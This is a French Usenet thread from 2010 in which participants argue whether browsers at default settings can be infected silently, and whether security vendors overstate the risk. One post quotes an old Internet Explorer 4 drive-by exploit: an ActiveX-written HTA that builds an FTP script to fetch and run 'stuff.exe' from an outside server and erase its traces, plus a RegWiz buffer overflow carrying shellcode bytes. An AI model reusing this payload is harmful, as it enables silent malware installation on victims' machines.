Resumé presque exustif des risques, dans gers et menaces

Az Sam
Assez long, il faut ca, et en anglais (si vous avez en Franchie n'hésitez
pas a donner le lien)
Les origines, les vulnérabilités, les menaces Virus/malware/spyware, le
spam, les Tel mobile, les bots nets, les conseils prévention et les outils
de l'éditeur de ce topo sécurité :
http://us.trendmicro.com/us/trendwatch/awareness-and-prevention/multimedia/videos/security-threats-101/

Luc (Burnouf ?) y appréciera la partie vulnérabilité concernant le
téléchargement en arrière plan de malware par la simple visite d'un site
(Les options par défaut des navigateurs ne sont pas souvent en place ;-))

--
Cordialement,
Az Sam.

Luc
Az Sam a écrit...

"Luc" a écrit dans le message
de news:4c8a9f0e$0$31716$

Tout au plus qu'ils prêchent pour leur paroisse. Rien de plus normal
au demeurant, mais c'est pour bien mettre en perspective le contenu
du lien.

Ah ben soyons clair : annoncent ils des choses inexactes dans le but
d'inquitéter et vendre leurs produits, ou annoncent ils des
phenomenes reels contre lesquels leurs outils proposent de proteger ?
Car si tu as regardé le petit topo que j'ai mis en lien il y est
clairement annoncé : "Sometimes you need only access a webpage with
a flawed browser" Tout ets dans le Flawed bien sur... (defectueux)

Ce qui ne signifie pas grand chose et en tout cas pas qu'un navigateur par
défaut puisse être infecté silencieusement.

Ce n'est pas pour autant qu'ils sont vulnérables. Mais c'est dommage
que tu ne répondes qu'à l'accessoire et que tu aies "oublié" la
majeure partie et l'essentiel de mon intervention qui traitait de
cela.

?
Je n'ai rien oublié du tout. Pourquoi prends tu la mouche ?

Je ne prends pas la mouche, je note seulement que tu as bien "oublié"
l'essentiel de mon intervention et c'est pourquoi je l'ai cité.

Je la cite pour rappel :
"[...]Pour la très grande majorité des internautes, le PC est un
outil, pas une
fin. Ils installent un logiciel et l'utilisent dans sa configuration
par défaut, point ! Parmi les rares qui fouillent dans les options
de leur navigateur, la plupart renforcent les paramètres de sécurité
aux risques, d'ailleurs de se trouver incapables d'ouvrir certaines
pages anodines, vidéos, .... Seuls quelques maladroits, une infime
minorité donc, vont faire
sauter des paramètres essentiels pour la sécurité. Ce sont de toute
façon les mêmes qui installeront le premier programme qui leur
promettra des photos de Haris Pilton à poil lors de leur surf sur
des sites pornographiques, quitte à ignorer obstinément les messages
d'avertissement de leur navigateur et/ou de leur antivirus. [...]"

Oui j'avais bien lu la meme chose. Mais je ne vois pas ce que cela
change. "Les utilisateurs (...) utilisent dans la configuration par
défaut", oui c'est vrai. Mais cette config par defaut n'est pas
immuable, c'ets sur ce point que je donne mon avis.
La partie sur ceux qui renforcent, je ne suis pas entré dedans, car
c'eut été pour te completer en rappellant que certains le font dans
l'autre sens : reduire les messages d'alertes et les blocages.
Mais ca n'apporte rien sur le sujet principal : les infections
silencieuses par simple visite d'une page web qui à été
piegée/compromise par injection de script et ce, même sur des sites
"officiels".

C'est évident que si tu prends pour principe puisse être paramétré n'importe
comment, tu peux prévoir n'importe quelle avanie, et donc, une fois que tu
as dis ça, tu n'as rien dit. J'ai bien toujours précisé comme condition
minimale "navigateur paramétré par défaut".

Exemple celui de la CAF

La CAF infecte silencieusement les navigateurs paramétrés par défaut. Ça
fout la trouille.

Pourquoi pas, mais là c'est ce serait un environnement qui n'a
vraiment plus rien à voir avec un environnement "par défaut". Et
donc, tu confirmes, toujours implicitement ;-) ce que je dis depuis
le début.

Si tu veux que je "te" confirme, je veux bien moi, ca ne me coute
rien. :-) Mais ce que j'evoque c'est avant tout la realité
quotidienne des machines des utilisateurs sur lesquelles on retrouve
des parametres de securite de IE (pour ne prendre que cela puisque
c'ets le sujet que tu souleves) qui ne sont plus "par defaut" mais
amoindries,

Mais c'est toi qui l'affirmes mais ce n'est pas vrai (je ne vais pas reciter
la réponse que je t'ai faite à ce sujet, n'est-ce pas ?) et quoi qu'il en
soit, il n'en reste pas moins vrai qu'un navigateur par défaut ne peut être
vérolé silencieusement sans la complicité active de l'utilisateur.

laissant ainsi plus facilement passé un script là ou,
sans cette "faille", un message d'avertissement apparaitrait a
l'utilisateur pour lui permettre de reflechir (sans garanti de
succes). On a le meme principe avec Vista et son UAC agacante que certains
(MVP meme !!) ont conseillés partout de desactiver :-/

Non, ce n'est pas du tout comparable. L'UAC est agaçant pour l'utilisateur
un peu "geek" qui installe, désintalle, fouille beaucoup est trop souvent
mis en garde par ce contrôle du compte utilisateur. L'utilisateur "de base"
qui se sert de son PC comme d'un outil ne verra qu'une poignée de rappels de
l'UAC au début de l'installation de son PC quand il installera ses logiciels
préférés, il n'aura pas le temps de s'agacer, par la suite, il n'en verra
plus.
Pour ce qui concerne les paramètres de sécurité des navigateurs, le niveau
par défaut permet d'aller et de voir ce qu'on veut sur la toile dans 99,99%
des lieux, l'utilisateur "de base" (je n'aime pas trop cette expression mais
bon, on se comprend) n'a jamais lieu d'aller y farfouiller.

Si tu le dis ! ;-)

oui, je le dis car je suis honnete. Mais ca ne signifie pas non plus
que j'ai raison de mettre le doute sur moi meme plutot que sur la
visite d'un site pourtant annodin, mais compromis et que je serais
allé visité avant qu'il n'ait été corrigé.

C'est dommage car tu aurais noté, j'en suis sûr le site en question et enfin
mon attente de plus de dix ans serait rompue ! ;-)

Remarque que si je n'ai pas d'antivirus, je n'incite personne à en
faire autant. Je ne laisserais pas un PC destiné à un ado bourré
d'hormones sans antivirus (le PC pas l'ado) par exemple...
Quoique... Des fois, j'en arrive à me demander si c'est utile. J'ai
eu l'occasion de démerdouiller des PC d'ados de cet acabit avec
antivirus de bonne facture, je n'ose même pas te décrire l'état !
Des sacs à vérolewares ! Inimaginable !

Un AV ne peut rien quand il avertit et recoit une fin de non recevoir.
Comme le cas de Pare feu type ZA, qui ont une liste de regles
d'autorisation pour chaque malware que l'utilisateur a rencontré mais
pour lesquels, n'y comprenant pas vraiment grand chose sauf que "si
il bloque ca marche plus", il a cliqué sur "Autoriser"...
C'est vrai que parfois on se demande s'il est bien utile de mettre une
quelconque protection. c'est aussi pour cela que certains produits,
bloquent ou supprimment sans donner la main a l'utilisateur sur le
choix a faire.

Personnellement, j'aime bien la méthode "éducative" plutôt
qu'"interdictive". Je *montre* l'ennemi en face, on combat mieux son ennemi
quand on le connaît. J'ai une bordée de mails avec PJ vérolées, je montre
leur tronche, leurs caractérisques. Ce n'est pas bien difficile de les
repérer avec leurs gros sabots. On voit très bien aussi que le danger, c'est
n'est pas de voir, mais d'installer (comme pour le surf en somme, on y
revient ! ;-) ), seule la PJ est infectante si on l'installe et ça, c'est
l'utilisateur qui peut le faire, personne d'autre.
On peut montrer aussi les dangers du surf, j'ai déjà parlé par exemple des
visites en des lieux malfamés qui proposent des logiciels promettant des
photos de Haris Pilton à poil devant Pris, on trouve aussi assez facilement
des liens qui t'annoncent tout de go que ton PC est pourri de centaines de
conchonneries et te proposent, des pseudo antivirus qui sont de vrais
rogues, etc, etc. Bref, en une heure tout au plus, on peut montrer à une
personne responsable les pièges tellement facile à éviter que ça vaut
parfois mieux que la fausse impression de sécurité que donne la foison
d'outils de sécurité qui ne fait que baisser le niveau de vigilance et le
bon sens de l'utilisateur.

Luc Burnouf
http://www.faqoe.com/

ok ;-)

--
Cordialement,

Luc Burnouf
http://www.faqoe.com/
Michel Doucet
Bonjour/soir, le Sat, 11 Sep 2010 11:04:20 +0200, *Luc* a caressé son

[...]

La conjonction de Windows + IE augmente les "chances" d'infections
silencieuses ... prouvé depuis au moins ... 10 ans !

Az Sam
"Luc" a écrit dans le message de
Az Sam a écrit...

[...]

mais pas le contraire non plus on ets bien d'accord.
A moi de te demander pourquoi tu as ignoré la question pour ne repondre qu'a
l'exemple ;-)

Je ne prends pas la mouche, je note seulement que tu as bien "oublié"
l'essentiel de mon intervention et c'est pourquoi je l'ai cité.

si on joue a ca on a pas fini... Passons.

[...]

et moi je te repete : ton cas, outre que tu ne le demontre pas plus que je
ne viens de te le contredire, ne s'applique pas souvent dans la realité :
des naviguateurs mal configurés, ca court les bureaux et ca court le net...

Exemple celui de la CAF

La CAF infecte silencieusement les navigateurs paramétrés par défaut. Ça
fout la trouille.

ah ben voila.... j'ai pourtant pris la peine de reposter derriere :-(
Adultes responsable disais tu, moi je suis d'accord hein.

Mais c'est toi qui l'affirmes mais ce n'est pas vrai (je ne vais pas
reciter la réponse que je t'ai faite à ce sujet, n'est-ce pas ?)

oui j'affirme que les naviguateurs, notement Ie dans notre echange, ne sont
pas toujours configurés avec les options par defaut, car je croise le cas
TRES regulierment dans ma pratique quotidienne.

et quoi qu'il en soit, il n'en reste pas moins vrai qu'un navigateur par
défaut ne peut être vérolé silencieusement sans la complicité active de
l'utilisateur.

ca je me garderais bien de l'affirmer quand meme à defaut de ne pouvoir dans
l'instant te le montrer.

[...]

Mais le "geek" (et meme le non geek, si dans geek on met plus qu'un neurone
servant a jouir) fera aussi ce genre de modification pour s'eviter des
messages d'avertissements de script ou d'activeX ou de page securisée/non
securisée dont il peut se passer du fait de sa bonne maitrise du net et de
sa connaissance approfondie des risques .(ce geek là, affirme par exemple
qu'il surf sans AV, lui)
[note : attention, je ne dis pas que tu es celui la, je rebondis seulement
sur ta propre affirmation que certains reprennent ensuite pour eux]

C'est dommage car tu aurais noté, j'en suis sûr le site en question et
enfin mon attente de plus de dix ans serait rompue ! ;-)

J'ai bien ca, mais c'est tres vieux donc ca ne fonctionne plus (IE4) :
///////////////////////////////////////////////
<object id="scr"
classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"></object>
<script>
scr.Path="C:Netmonn.hta";
scr.Doc="<object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>wsh.Run('command
/c echo ftp -v -i -s:c:\repair.zip
ftp.respublica.fr>>c:\repair.bat',true,1);wsh.Run('command /c echo
stuff.exe>>c:\repair.bat',true,1);wsh.Run('command /c echo deltree /y
c:\repair.zip>>c:\repair.bat',true,1);wsh.Run('command /c echo deltree
/y c:\Netmonn.hta>>c:\repair.bat',true,1);wsh.Run('command /c echo
deltree /y c:\repair.bat>>c:\repair.bat',true,1);wsh.Run('command /c
echo kaliko>> c:\Repair.zip',false,6);wsh.Run('command /c echo ZorkZ>>
c:\Repair.zip',false,6);wsh.Run('command /c echo lcd c:\windows>>
c:\Repair.zip',false,6);wsh.Run('command /c echo binary>>
c:\Repair.zip',false,6);wsh.Run('command /c echo get stuff.exe>>
c:\Repair.zip',false,6);wsh.Run('command /c echo
quit>>c:\Repair.zip',false,6);wsh.Run('c:\repair.bat',false,6)</"+"SCRIPT>";scr.write();
</script>
<object classid="clsid:50E5E3D1-C07E-11D0-B9FD-00A0249F6B00"
id="RegWizObj"></object>
<script language="VbScript" >
expstr = "/i
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
expstr = expstr & Chr(235)
expstr = expstr & Chr(53)
expstr = expstr & Chr(208)
expstr = expstr & Chr(127)
expstr = expstr + Chr(144)
expstr = expstr + Chr(139) + Chr(252)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)
expstr = expstr + Chr(80)
expstr = expstr + Chr(87)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + Chr(51) + Chr(192)
expstr = expstr + Chr(80)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + "mshta c:Netmonn.hta"
RegWizObj.InvokeRegWizard(expstr)
////////////////////////////////////////////////////////////////////////////

Les hta n'impliquaient pas de mise en garde de la part du systeme a cette
epoque.

Personnellement, j'aime bien la méthode "éducative" plutôt
qu'"interdictive".

moi aussi, mais il y a de nombreux obstacles internes : semantiques,
cognitifs et parfois meme organiques.
et externes : pression comerciale, ingienierie sociale, complexification.

[...]

pour le mail c'est toujours vrai.. quoique là aussi visionner avec OE5 dans
le panneau de visualistaion des mail en html pouvait permettre l'execution
d'un script. Le hta ci dessus etait d'ailleurs diffusé comme cela si je me
souviens bien.
De meme que les reglage "par defaut" du courielleur. Ca lui a valu une sale
reputation qui lui colle encore au basque au point que MS l'a renommé en
Windows Mail sur Vista.
On pourrait aussi soulever les cas des pdf, des jpg, des flash... forgés.

[...]

les rogues, oui ca pullule.

[...]

Le seul bon sens n'est pas suffisant. La tromperie se sophistique autant que
les langages (HML5 bientôt... brrr) se complexifient.
Sans compter les réseaux sociaux (lit de l'ingienierie sociale) ou le "tout
en ligne" (dé-responsabilisation de l'utilisateur en lui rendant tout
toujours "plus simple", moins il pense, mieux c'est....)

--
Cordialement,
Az Sam.
Luc
Az Sam a écrit...

"Luc" a écrit dans le message
de news:4c8b4617$0$9919$
Az Sam a écrit...

[...]

??

Je ne prends pas la mouche, je note seulement que tu as bien "oublié"
l'essentiel de mon intervention et c'est pourquoi je l'ai cité.

si on joue a ca on a pas fini... Passons.

Ben si c'est toi qui "oublie", tu passes plus facile forcément ! ;-)

[...]

Mais non, c'est inexact... mais bon, comme tu dis, on peut jouer à ça
pendant des lustres.

Exemple celui de la CAF

La CAF infecte silencieusement les navigateurs paramétrés par
défaut. Ça fout la trouille.

ah ben voila.... j'ai pourtant pris la peine de reposter derriere :-(

??? C'est toi qui donne l'exemple de la CAF

Adultes responsable disais tu, moi je suis d'accord hein

Eh oui

[...]

Je ne vais pas relancer sur le proportion relative navigateurs paramétrer
par défaut ou non, on va encore tourner en rond mais, il restera toujours
vrai que dans le cas d'un paramétrage par défaut, on ne peut pas être
infecté silencieusement.

[...]

Et il ne faut surtout pas affirmer le contraire quand *un seul* exemple de
lien infectant donnerait raison à cette thèse alors que pour l'inverse, il
faudrait citer tous les liens non infectant ce qui serait impossible.

[...]

IE4 ! Tu remontes au siècle dernier !
No comment.

///////////////////////////////////////////////
[...]
stuff.exe>> c:\Repair.zip',false,6);wsh.Run('command /c echo
[...]

Avec OE5, non, avec OE4 oui... mais bon, même remarque que ci-dessus, siècle
dernier, tout ça...

De meme que les reglage "par defaut" du courielleur. Ca lui a valu
une sale reputation qui lui colle encore au basque au point que MS
l'a renommé en Windows Mail sur Vista.

Ouais enfin, quand on veut salir LE mauvais objet par excellence, leader sur
le marché, produit de Microsoft... il est l'objet de toutes les calomnies,
il en reste toujours quelque chose, parît même qu'il mange les petits
enfants.

[...]

Le bon sens *et* la (re)connaissance du danger. Mais rien n'est suffisant à
100% bien sûr

[...]

Alors je crois comprendre qu'on est d'accord sur ce point : la pédagogie qui
mise (aussi) sur la connaissance et l'intelligence de l'utilisateur valent
mieux que sur le "dormez en paix braves gens, je pense pour vous... et
achetez mes produits de sécurité". Les ceintures, bretelles, airbags... de
sécurité ne dispensent pas les conducteurs d'être prudents, attentifs et
conscients des risques.

--
Cordialement,

Luc Burnouf
http://www.faqoe.com/
Az Sam
"Christophe Bachmann" a écrit dans le message de

Amusant, il semble qu'Avast Gratuit 5.0.677 avec la base 100910-1 détecte
un virus dans ce message et ses réponses.

c'était l'époque ou Avast était effectivement efficace :-p

aurait il réagi au simple "respublica.fr" qui existe toujours ?

--
Cordialement,
Az Sam.
Az Sam
"Luc" a écrit dans le message de

??

je dois reecrire ? decidement :-/
bon :
[citation ON]

[...]

[citation OFF]

alors , toi tu penses quoi ? inexactitudes ou phenomenes reels ?

Ben si c'est toi qui "oublie", tu passes plus facile forcément ! ;-)

Mais non, c'est inexact... mais bon, comme tu dis, on peut jouer à ça
pendant des lustres.

??? C'est toi qui donne l'exemple de la CAF

et tu n'as pas vu mon second message ou tu ne l'as pas lu ?

Eh oui

Je te trouve un esprit polemique a agir de la sorte. Bon on est sur
Usenet... C'est monnaie courante apres tout.

[...]

et si tu nous disais pourquoi pour etayer un peu ?

[...]

il faudrait *aussi* definir les conditions de l'infection ou de la non
infection. Car tu dis "par defaut", mais tu ne precise pas quels defauts.
Car ces defauts varient d'une version a l'autre de IE au cours des années.
Si c'est "a ce jour, pour la version IE8 actuelle et à jour" il faudrait le
preciser.
De meme il faudrait definir les conditions de l'envirronnement systeme.
Exemple simple : valable pour 32bits ou 64bits ou meme les 2 ?
Je veux bien sur par là evoquer les script et les objets qui utilisent des
failles systemes non closes.

IE4 ! Tu remontes au siècle dernier !
No comment.

ah ben voila, tu pleures pour avoir quelquechose et quand on te donne une
miette tu n'en veux pas :-)
Tu aurais pu au moiins convenir que cet exemple repond parfaitement a la
question : "peux t on se faire infecter sans action de l'utilisateur
simplement en affichant une page web ?"

Avec OE5, non, avec OE4 oui... mais bon, même remarque que ci-dessus,
siècle dernier, tout ça...

Avec ta FAQ c'est toi le specialiste OE. Donc tu dois avoir riason
A partir de quelle version de windows est apparue OE5, et quels etaient ses
options possibles et ses reglages par defaut ?

[...]

J'ai toujouts utilise OE qui a parfaitement repondu a mes besoins, ca ne
m'empeche pas d'accepter qu'il n'ait pas été parfait. Perso quand la zone
internet est arrivée dans le options accessibles, j'ai eu tot fait de
l'activer alors qu'elle n'y etait pas par defaut. Et je reconnais bien
volotiers que c'etait là une erreur incomprehensible de MS.
Le cynisme de l'ogre n'est a mon avis pas à propos du tout sous les doigts
d'un adulte et collegue informaticien responsable. ;-)

[...]

Toutes les personnes un tant soit peu concernées par la sécurité
informatique est d'accord avec cela.

--
Cordialement,
Az Sam.
Michel Doucet
Bonjour/soir, le Sat, 11 Sep 2010 14:05:49 +0200, *Az Sam* a caressé son

Je te trouve un esprit polemique a agir de la sorte. Bon on est sur
Usenet... C'est monnaie courante apres tout.

Eh oui, il y a quelques années je lui ai mis son nez dans son caca ... il
m'a plonké ...*Monsieur* n'aime pas être contredit même avec des vérités
avérées.

Luc
Az Sam a écrit...

il faudrait *aussi* definir les conditions de l'infection ou de la non
infection. Car tu dis "par defaut", mais tu ne precise pas quels
defauts.

C'est sûr que si on ne s'entend pas sur le sens de "par défaut" que j'ai
posée comme condition incontournable depuis le début, on peut discutailler
pendant des lustres en vain. Par défaut, c'est le paramétrage du logiciel
proposé à la première ouverture du logiciel et plus particulièrement dans la
discussion qui nous occupe pour tout ce qui concerne la sécurité. Pour IE,
par exemple, il y a un bouton 'Niveau par défaut' dans les options de
sécurité. Dispense-moi, s'il te plaît de devoir préciser tous les paramètres
que recouvre ce niveau.
Maintenant, faut tout relire sous cet éclairage.

--
Cordialement,

Luc Burnouf
http://www.faqoe.com/
Az Sam
"Luc" a écrit dans le message de
Az Sam a écrit...

[...]

ben oui mais comme je le disais, ce paramétrage par défaut n'est pas le même
d'une version a l'autre et d'une mise a jour a l'autre...

Disons, qu'au départ, tu ne l'a pas précisé et je l'ai entendu comme tu le
dis maintenant c'est a dire "niveau par défaut" sans plus se préoccuper de
ce en quoi ce défaut consiste.
Dans cette situation, je redis que je rencontre très fréquemment des
machines ou ce niveau est modifié.
Parfois sur les conseils de MS :
http://www.microsoft.com/france/technet/security/bulletin/MS10-042.mspx
ou
http://www.microsoft.com/technet/security/bulletin/ms09-032.mspx)

(A noter que ces pages ont depuis été mises a jour et clôturée, au départ le
conseil était "désactivez en attendant le patch de Maj.")

Mais tu me soutiens que ce n'est pas vrai alors bon, je suis bien oblige de
te demander de détailler un peu

Enfin, bref, je pense que l'on ne va pas y arriver, ca part en couille, on
en est a se demander mutuellement de se justifier, la conversation ne peut
tenir sereinement je pense.

--
Cordialement,
Az Sam.
Luc
Az Sam a écrit...

"Luc" a écrit dans le message
de news:4c8ba28e$0$8904$
Az Sam a écrit...

[...]

Si si.
Tu m'as pas interpelé dans le message inital de ce fil en référence au fil
contigu "Bit Defender et ralentissement du PC" or dans ma première
contribution sur ce sur fil (9/09, 14:49), j'ai été très précis.
Je cite : "[...] Avec n'importe lequel des navigateurs (Internet Explorer,
FireFox, Opera, pour ne citer que les plus courants) à jour et paramétrés
par défaut, il est complétement impossible d'être infecté spontanément
[...]".
Je n'allais pas le répéter à chaque fois, c'eût été lourd à taper,
fastidieux à lire, aussi, par la suite et dans le contexte, ai-je parlé de
[...]

À jour et paramétré par défaut, quel que soit le navigateur, il n'y a pas
tellement de latitude.

Enfin, bref, je pense que l'on ne va pas y arriver, ca part en
couille,

Comme disait Blier alias Milan dans Le Grand blond, on tourne en rond ,
merde ! On tourne en rond , merde ! On tourne en rond , merde ! ;-)

on en est a se demander mutuellement de se justifier, la
conversation ne peut tenir sereinement je pense.

Si, tant qu'on ne cherche pas à disqualifier son contradicteur.

--
Cordialement,

Luc Burnouf
http://www.faqoe.com/